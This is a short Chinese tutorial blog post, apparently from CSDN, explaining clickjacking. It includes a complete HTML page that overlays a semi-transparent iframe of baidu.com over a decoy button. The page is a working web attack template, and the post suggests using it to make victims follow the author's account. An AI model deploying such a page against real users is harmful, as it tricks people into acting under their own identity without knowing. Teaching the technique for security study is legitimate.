版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
【渗透测试-web安全】点击劫持
基本概念:通过覆盖不可见的框架误导受害者点击而造成的攻击行为。
例:我们通过设计网页,将一个常规的网页隐藏在我们设计的网页之后,诱导用户点击设计网页界面,但实际用户点击的是常规的网页,从而用户的点击操作就让其在不知情的情况下操作一些常规的网站,利用用户的身份达到我们的某些目的,比如让用户关注我们的CSDN账号等。
构造一个点击劫持:
~~~html
<!DOCTYPE html>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf8" />
<head>
<title>Click Jack!!!</title>
<style>
html,body,iframe{
display: block;
height: 100%;
width: 100%;
margin: 0;
padding: 0;
border: none;
}
iframe{
opacity: 0;
filter:alpha(opacity=30);
-moz-opacity:0.3;
opacity:0.3;
position:absolute;
z-index:2;
}
button{
position: absolute;
top: -5px;
left: 875px;
z-index: 1;
width: 350px;
height: 700px;
}
</style>
</head>
<body>
<button><img src="images/click.png"></button>
<iframe src="https://www.baidu.com/"></iframe>
</body>
</html>
~~~